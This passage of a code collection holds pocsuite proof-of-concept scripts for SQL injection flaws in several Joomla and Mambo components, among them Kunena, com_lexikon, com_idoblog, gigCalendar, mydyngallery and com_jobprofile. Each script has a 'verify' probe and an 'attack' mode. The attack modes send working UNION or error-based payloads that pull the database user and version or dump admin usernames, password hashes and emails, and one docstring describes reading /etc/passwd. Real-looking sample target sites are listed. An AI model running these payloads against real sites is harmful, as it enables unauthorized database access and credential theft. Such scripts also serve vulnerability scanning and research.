    pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: MySQL duplicate-key error text in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if 'Duplicate entry' in resp.content:
        match=re.search(pars,resp.content,re.I|re.M)
        if match:
            result['DatabaseInfo']={}
            # group(1) = user(), group(2) = version()
            result['DatabaseInfo']['Username']=match.group(1)
            result['DatabaseInfo']['Version']=match.group(2)
    return self.parse_output(result)
59 |
def _verify(self):
    """Verify mode: same error-based probe, echoing md5(3.1415) instead of DB data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body; no
    table data is read. On success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Error-based (floor/RAND duplicate-key) payload carrying md5(3.1415) as the marker.
    payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
    "(md5(3.1415),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA"
    ".CHARACTER_SETS GROUP BY x)a) -- -")
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_hdflvplayer&id='
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
86 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla mydyngallery 1.4.2 ``directory`` parameter SQL injection (SSV-10171).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '10171' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2008-12-05'
    createDate = '2016-01-09'
    updateDate = '2016-01-09'
    references = ['http://www.sebug.net/vuldb/ssvid-10171']
    name = 'Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla!'
    appVersion = '1.4.2'
    vulType = 'SQL injection'
    # Runtime string (Chinese description); left verbatim.
    desc = '''
Joomla组件mydyngallery版本1.4.2在参数directory由于过滤不严格,存在SQL注入漏洞。
远程攻击中可以利用该漏洞执行SQL指令,获取敏感信息。
'''
    # Example hosts recorded by the original author; nothing in this file reads them.
    samples = ['http://www.lesgourmands.com','http://www.sebka.ca/w']
26 |
def _attack(self):
    """Attack mode: error-based extraction of the DB user and MySQL version.

    One GET is sent to the com_mydyngallery ``directory`` parameter. If the
    body contains MySQL's 'Duplicate entry' error text, the user()/version()
    values echoed between the ``$~~~$`` and ``***`` delimiters are parsed into
    ``result['DatabaseInfo']``; otherwise ``result`` stays empty and
    ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_mydyngallery&directory='
    # Error-based (floor/RAND duplicate-key) payload. The echoed string is
    # SUBSTRING(...,1,60), so user()+version() longer than 60 chars is truncated
    # and the closing '$~~~$' may be cut off (the regex then fails to match).
    payload="1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT("\
    "(SELECT SUBSTRING(CONCAT(0x247e7e7e24,user(),0x2a2a2a,"\
    "version(),0x247e7e7e24),1,60)),FLOOR(RAND(0)*2))X FROM "\
    "information_schema.tables GROUP BY X)a) and '1'='1"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex. NOTE(review): not a raw string -- '\$' and '\*' are
    # unknown escapes; r'...' is the intended form.
    parttern='\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: MySQL duplicate-key error text in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if 'Duplicate entry' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['DatabaseInfo']={}
            # group(1) = user(), group(2) = version()
            result['DatabaseInfo']['Username']=match.group(1)
            result['DatabaseInfo']['Version']=match.group(2)
    return self.parse_output(result)
61 |
def _verify(self):
    """Verify mode: same error-based probe, echoing md5(1) instead of DB data.

    Success is declared only when the literal md5(1) digest
    (c4ca4238a0b923820dcc509a6f75849b) appears in the response body; no table
    data is read. On success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_mydyngallery&directory='
    # Error-based (floor/RAND duplicate-key) payload carrying md5(1) as the marker.
    payload="1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT"\
    "((SELECT SUBSTRING(CONCAT(md5(1),0x247e7e7e24),1,60)),"\
    "FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) and '1'='1"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(1) == c4ca4238a0b923820dcc509a6f75849b
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
88 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
97 |
98 |
99 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Kunena Component (index.php, search parameter) SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla Kunena ``search`` parameter SQL injection (SSV-75964).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '75964' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2012-11-21'
    createDate = '2016-01-22'
    updateDate = '2016-01-22'
    references = ['http://www.seebug.org/vuldb/ssvid-75964']
    name = 'Joomla Kunena Component (index.php, search parameter) SQL Injection'
    # NOTE(review): trailing space inside the URL literal is in the original.
    appPowerLink = 'http://www.kunena.org/ '
    appName = 'Joomla Kunena Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description plus the reference PoC URL); left verbatim.
    desc = '''
Joomla Kunena组件在index.php的参数search由于过滤不严格,导致出现SQL注入漏洞。
远程攻击者可以利用该漏洞执行SQL指令。该漏洞验证的POC格式如下(计算md5(1)):

http://XXX/index.php?option=com_kunena&func=userlist&search=%' and 1=2)
union select 1, 1,md5(1),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users-- ;
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://www.nakhonbanguns.com']
29 |
def _attack(self):
    """Attack mode: UNION-based read of the first ``jos_users`` row.

    One GET is sent to the com_kunena userlist ``search`` parameter. If the
    ``$~~~$`` delimiter appears in the body, username / password column /
    email are parsed into ``result['AdminInfo']``; otherwise ``result`` stays
    empty and ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_kunena&func=userlist&search='
    # UNION payload (15 columns); 0x247e7e7e24 / 0x2a2a2a are the '$~~~$' and
    # '***' delimiters the regex below keys on.
    payload="%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\
    "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;"
    # Payload is concatenated onto the URL without encoding (the leading '%'
    # is sent literally).
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (three groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match if the delimiters occur more than once in the page.
    parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: the '$~~~$' delimiter echoed in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if '$~~~$' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['AdminInfo']={}
            # group(1) username, group(2) password column, group(3) email
            result['AdminInfo']['Username']=match.group(1)
            result['AdminInfo']['Password']=match.group(2)
            result['AdminInfo']['Email']=match.group(3)
    return self.parse_output(result)
def _verify(self):
    """Verify mode: UNION probe echoing md5(3.1415) instead of table data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body. On
    success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_kunena&func=userlist&search='
    # UNION payload (15 columns) with md5(3.1415) as the marker.
    payload="%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
88 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
97 |
98 |
99 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
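class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla!/Mambo com_lexikon ``id`` parameter SQL injection (SSV-84553).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '84553' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-02-16'
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-84553']
    # Fix: the original wrapped 'id' in unescaped single quotes inside a
    # single-quoted literal, which is a SyntaxError and kept the module from
    # importing at all. Double quotes keep the same text.
    name = "Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability"
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla! and Mambo com_lexikon Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description plus the reference PoC URL); left verbatim.
    desc = '''
Joomla! and Mambo com_lexikon组件的参数 id 过滤不严,导致出现SQL注入漏洞。

该漏洞的POC格式如下:
http://www.example.com/index.php?option=com_lexikon&id=-1/**/union/**/select
/**/concat(username,0x3a,password),concat(username,0x3a,password),concat
(username,0x3a,password) from mos_users--+
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://www.deutsche-handwerker.info']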
30 |
def _attack(self):
    """Attack mode: UNION-based read of the first ``mos_users`` row.

    One GET is sent to the com_lexikon ``id`` parameter. If the ``$~~~$``
    delimiter appears in the body, username / password column / email are
    parsed into ``result['AdminInfo']``; otherwise ``result`` stays empty and
    ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_lexikon&id='
    # UNION payload (3 columns, Mambo-era mos_users table); 0x247e7e7e24 /
    # 0x2a2a2a are the '$~~~$' and '***' delimiters the regex below keys on.
    payload=("-1 union select 1,concat(0x247e7e7e24,username"
    ",0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),3 from mos_users limit 0,1--+")
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (three groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match if the delimiters occur more than once in the page.
    parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: the '$~~~$' delimiter echoed in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if '$~~~$' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['AdminInfo']={}
            # group(1) username, group(2) password column, group(3) email
            result['AdminInfo']['Username']=match.group(1)
            result['AdminInfo']['Password']=match.group(2)
            result['AdminInfo']['Email']=match.group(3)
    return self.parse_output(result)
65 |
def _verify(self):
    """Verify mode: UNION probe echoing md5(3.1415) instead of table data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body. On
    success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_lexikon&id='
    # UNION payload (3 columns) with md5(3.1415) as the marker.
    payload="-1 union select 1,md5(3.1415),3--+"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
90 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
99 |
100 |
101 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_idoblog) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla com_idoblog ``userid`` parameter SQL injection (SSV-70468).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '70468' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-12-25'
    createDate = '2016-01-23'
    updateDate = '2016-01-23'
    references = ['http://www.seebug.org/vuldb/ssvid-70468']
    name = 'Joomla Component (com_idoblog) SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component (com_idoblog)'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description plus the reference PoC URL); left
    # verbatim. The reference uses updatexml(); the code below uses the
    # floor/RAND variant instead.
    desc = '''
Joomla 组件(com_idoblog)对参数userid过滤不严格,导致出现SQL注入漏洞。
远程攻击者无需登陆,可以利用该漏洞执行SQL指令。

利用updatexml报错回显方式读取数据库版本的POC如下所示:

http://xxx.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=-1
or 1=(updatexml(1,concat(0x3a,version()),1))
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://www.aca2k.org']
31 |
def _attack(self):
    """Attack mode: error-based extraction of the DB user and MySQL version.

    One GET is sent to the com_idoblog ``userid`` parameter (``Itemid`` is
    sent empty). If the body contains MySQL's 'Duplicate entry' error text,
    the user()/version() values echoed between the ``$~~~$`` and ``***``
    delimiters are parsed into ``result['DbInfo']``; otherwise ``result``
    stays empty and ``parse_output`` reports failure. Exceptions from
    ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
    # Error-based (floor/RAND duplicate-key) payload; 0x247e7e7e24 / 0x2a2a2a
    # are the '$~~~$' and '***' delimiters the regex below keys on.
    payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
    "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (two groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match if the delimiters occur more than once in the page.
    parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: MySQL duplicate-key error text in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if 'Duplicate entry' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            # NOTE: key is 'DbInfo' here, 'DatabaseInfo' in sibling PoCs.
            result['DbInfo']={}
            # group(1) = user(), group(2) = version()
            result['DbInfo']['Username']=match.group(1)
            result['DbInfo']['Version']=match.group(2)
    return self.parse_output(result)
65 |
def _verify(self):
    """Verify mode: same error-based probe, echoing md5(3.1415) instead of DB data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body; no
    table data is read. On success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
    # Error-based (floor/RAND duplicate-key) payload carrying md5(3.1415) as the marker.
    payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
    "md5(3.1415),FLOOR(RAND(0)*2))x FROM "\
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
92 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
101 |
102 |
103 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
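class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla!/Mambo gigCalendar 1.0 ``gigcal_bands_id`` SQL injection (SSV-86077).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '86077' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-02-24'
    createDate = '2016-01-20'
    updateDate = '2016-01-20'
    references = ['http://www.sebug.net/vuldb/ssvid-86077']
    # Fix: the original wrapped 'banddetails.php' in unescaped single quotes
    # inside a single-quoted literal, which is a SyntaxError and kept the
    # module from importing at all. Double quotes keep the same text.
    name = "Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability"
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla! and Mambo gigCalendar Component'
    appVersion = '1.0'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description plus the reference PoC URL); left verbatim.
    desc = '''
gigCalendar是一个免费的为维护网站旅游日志的的Joomla! and Mambo组件。
Mambo和Joomla! GigCalendar (com_gigcal)组件中存在多个SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者
(1)可以借助对index.php的一个细节操作的gigcal _venues_id参数,且该参数没有经过venuedetails.php适当地处理,以执行任意SQL指令;
(2)借助对index.php的一个细节操作中igcal_bands_id参数,且该参数没有经过banddetails.php适当地处理,以执行任意SQL命令。

利用的POC格式是:http://XXX.com/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,md5(1),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://www.semion.com.sg']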
31 |
def _attack(self):
    """Attack mode: UNION-based read of ``jos_users`` rows.

    One GET is sent to the com_gigcal ``gigcal_bands_id`` parameter. If the
    ``$~~~$`` delimiter appears in the body, username / password column /
    email are parsed into ``result['AdminInfo']``; otherwise ``result`` stays
    empty and ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_gigcal&task=details&gigcal_bands_id='
    # UNION payload (12 columns, '%23' = '#' comment terminator); 0x247e7e7e24
    # / 0x2a2a2a are the '$~~~$' and '***' delimiters the regex below keys on.
    payload="-1' UNION ALL SELECT 1,2,3,4,5,concat(0x247e7e7e24,username,"\
    "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),NULL,NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23"
    # Payload is concatenated onto the URL without further encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (three groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match when several rows are echoed (no LIMIT in the payload).
    parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: the '$~~~$' delimiter echoed in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if '$~~~$' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['AdminInfo']={}
            # group(1) username, group(2) password column, group(3) email
            result['AdminInfo']['Username']=match.group(1)
            result['AdminInfo']['Password']=match.group(2)
            result['AdminInfo']['Email']=match.group(3)
    return self.parse_output(result)
66 |
def _verify(self):
    """Verify mode: UNION probe echoing md5(3.1415) instead of table data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body. On
    success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_gigcal&task=details&gigcal_bands_id='
    # UNION payload (12 columns) with md5(3.1415) as the marker.
    payload="-1' UNION ALL SELECT 1,2,3,4,5,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23"
    # Payload is concatenated onto the URL without further encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
91 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
100 |
101 |
102 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Jobprofile Component (com_jobprofile) - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite POC for the Joomla com_jobprofile ``id`` SQL injection.

    ``_verify`` probes the flaw by reading ``/etc/passwd`` through MySQL's
    ``load_file``; ``_attack`` reads the first row of ``jos_users`` instead.
    Both return an ``Output`` built by ``parse_output``. This is Python 2
    code (``str.encode('hex')``, ``resp.content`` handled as str).
    """
    vulID = '72384' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-12-02'
    createDate = '2016-01-22'
    updateDate = '2016-01-22'
    references = ['http://www.seebug.org/vuldb/ssvid-72384']
    name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'
    appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'
    appName = 'Joomla Jobprofile Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
Joomla Jobprofile 组件 index.php 的参数id由于过滤不严,导致出现SQL注入漏洞。
远程攻击者可以利用该漏洞执行SQL指令。

利用该漏洞计算md5(1)的POC格式如下:

http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview
&id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--

下面的将分别利用注入漏洞读取joomla管理员口令密码,以及读取/etc/passwd文件的内容。
'''
    samples = ['http://www.astellas.cz']

    def _attack(self):
        """Read one ``jos_users`` row (username, password hash) via UNION injection.

